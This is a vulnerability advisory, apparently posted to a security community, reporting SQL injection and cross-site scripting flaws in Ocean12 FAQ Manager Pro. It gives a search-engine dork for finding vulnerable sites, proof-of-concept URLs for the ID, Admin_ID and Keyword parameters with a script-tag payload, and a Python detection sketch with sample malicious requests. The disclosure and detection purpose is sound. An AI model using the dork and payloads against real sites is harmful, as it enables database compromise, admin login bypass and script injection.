Ocean12 FAQ Manager Pro suffers from remote SQL injection and cross-site scripting vulnerabilities.
bab57a2d908c54f939b9e9b850b53562a5c42438d7806670c3009b30a852b1d3
Application: Ocean12 FAQ Manager Pro
Vendor Name: Ocean12
Vendor URL: http://ocean12tech.com/
Bug Type: Ocean12 FAQ Manager Pro (SQL,XSS) Multiple Vulnerabilities
Exploitation: Remote
Google Dork: "Maintained with the Ocean12 FAQ Manager Pro"
SQL POC
http://ocean12tech.com/products/faq/demo/default.asp?Action=Cat&ID=[SQL]
http://ocean12tech.com/products/faq/demo/admin/login.asp?Admin_ID=[SQL]&Password=pass
XSS POC
http://ocean12tech.com/products/faq/demo/default.asp?Action=Search&Keyword=<script>alert("xssed")</script>
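Detection sketch for the three parameters listed above (an added example, not part of the original advisory or the vendor's code). It assumes ID is a numeric category identifier and that Admin_ID and Keyword never legitimately carry SQL metacharacters or angle brackets; the request lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets for illustration (not taken from a real log).
SAMPLE_REQUESTS = [
    "/products/faq/demo/default.asp?Action=Cat&ID=3",
    "/products/faq/demo/default.asp?Action=Cat&ID=3%27",
    "/products/faq/demo/admin/login.asp?Admin_ID=admin&Password=pass",
    "/products/faq/demo/admin/login.asp?Admin_ID=x%27&Password=pass",
    "/products/faq/demo/default.asp?Action=Search&Keyword=printer+setup",
    "/products/faq/demo/default.asp?Action=Search"
    "&Keyword=%3Cscript%3Ealert(%22xssed%22)%3C/script%3E",
]

NUMERIC = re.compile(r"[0-9]+")            # assumption: ID is an integer key
SQL_META = re.compile(r"['\";]|--|/\*")    # quote, statement and comment tokens
MARKUP = re.compile(r"[<>]")               # any tag delimiter in a search term


def classify(request_target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(request_target)
    path = parts.path.lower()
    # parse_qs percent-decodes values; keys are lowercased because Classic ASP
    # treats query-string names case-insensitively.
    query = parse_qs(parts.query, keep_blank_values=True)
    params = {key.lower(): values for key, values in query.items()}
    findings = []
    if path.endswith("/admin/login.asp"):
        if any(SQL_META.search(v) for v in params.get("admin_id", [])):
            findings.append("sqli:Admin_ID")
    elif path.endswith("/default.asp"):
        if any(not NUMERIC.fullmatch(v) for v in params.get("id", [])):
            findings.append("sqli:ID")
        if any(MARKUP.search(v) for v in params.get("keyword", [])):
            findings.append("xss:Keyword")
    return findings


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(classify(target) or ["clean"], target)
```

The same allow-list checks (integer-only ID, no markup in Keyword) are what the application itself should enforce, together with parameterized queries and HTML-encoding of the echoed search term.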
Credits:
Charalambous Glafkos
Email: glafkos (at) astalavista (dot) com
___________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net
Best Regards,
Charalambous Glafkos ( nowayout )